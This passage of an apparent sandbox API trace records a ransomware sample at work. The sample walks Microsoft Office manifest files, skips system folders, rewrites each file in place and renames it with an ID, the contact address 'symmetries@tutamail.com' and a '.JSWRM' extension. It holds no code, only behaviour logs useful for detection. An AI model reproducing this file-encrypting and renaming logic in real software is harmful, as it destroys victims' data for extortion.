lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0072.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.630] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xbf2f172d, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0xbf2f172d, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0xbf33deae, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", cAlternateFileName="APC553~1.XML")) returned 1 [0072.631] lstrcmpiW (lpString1="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.631] lstrcmpiW (lpString1="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.631] lstrcmpiW (lpString1="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.631] lstrcmpiW (lpString1="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.631] lstrcmpiW (lpString1="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.631] lstrcmpiW (lpString1="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.631] lstrcmpiW (lpString1="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.631] lstrcmpiW (lpString1="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.631] lstrcmpiW (lpString1="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.631] lstrcmpiW (lpString1="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0072.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0072.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0072.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0072.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20de78, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0072.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0072.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0072.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0072.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.632] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=1261) returned 1 [0072.632] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e0) returned 0x203550 [0072.632] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x4e0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345ef6c*=0x4e0, lpOverlapped=0x0) returned 1 [0072.634] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.634] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345ef68*=0x4e0, lpOverlapped=0x0) returned 1 [0072.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0072.634] CloseHandle (hObject=0x458) returned 1 [0072.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0072.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0072.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0072.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0072.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0072.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0072.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0072.634] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0072.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0072.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0072.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.636] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xbf2f172d, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0xbf2f172d, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0xbf2f172d, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x53d21, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", cAlternateFileName="AP9FA1~1.XML")) returned 1 [0072.636] lstrcmpiW (lpString1="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.636] lstrcmpiW (lpString1="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.636] lstrcmpiW (lpString1="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.636] lstrcmpiW (lpString1="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.636] lstrcmpiW (lpString1="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.636] lstrcmpiW (lpString1="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.636] lstrcmpiW (lpString1="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.636] lstrcmpiW (lpString1="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.636] lstrcmpiW (lpString1="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.636] lstrcmpiW (lpString1="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0072.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0072.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0072.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0072.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0072.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0072.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0072.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.637] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=343329) returned 1 [0072.637] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24b1c8 [0072.637] ReadFile (in: hFile=0x458, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345ef6c*=0x27100, lpOverlapped=0x0) returned 1 [0072.650] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.650] WriteFile (in: hFile=0x458, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345ef68*=0x27100, lpOverlapped=0x0) returned 1 [0072.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0072.650] CloseHandle (hObject=0x458) returned 1 [0072.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0072.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0072.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0072.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0072.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0072.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.651] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0072.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0072.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.651] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83ea71ba, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3a41, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", cAlternateFileName="AP330B~1.XML")) returned 1 [0072.652] lstrcmpiW (lpString1="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.652] lstrcmpiW (lpString1="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.652] lstrcmpiW (lpString1="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.652] lstrcmpiW (lpString1="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.652] lstrcmpiW (lpString1="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.652] lstrcmpiW (lpString1="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.652] lstrcmpiW (lpString1="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.652] lstrcmpiW (lpString1="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.652] lstrcmpiW (lpString1="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.652] lstrcmpiW (lpString1="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0072.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0072.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0072.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0072.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20de78, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0072.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0072.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0072.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0072.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.653] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=14913) returned 1 [0072.653] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3a40) returned 0x24b1c8 [0072.653] ReadFile (in: hFile=0x458, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0x3a40, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345ef6c*=0x3a40, lpOverlapped=0x0) returned 1 [0072.655] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.655] WriteFile (in: hFile=0x458, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0x3a40, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345ef68*=0x3a40, lpOverlapped=0x0) returned 1 [0072.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0072.655] CloseHandle (hObject=0x458) returned 1 [0072.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0072.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0072.656] MultiByteToWideChar 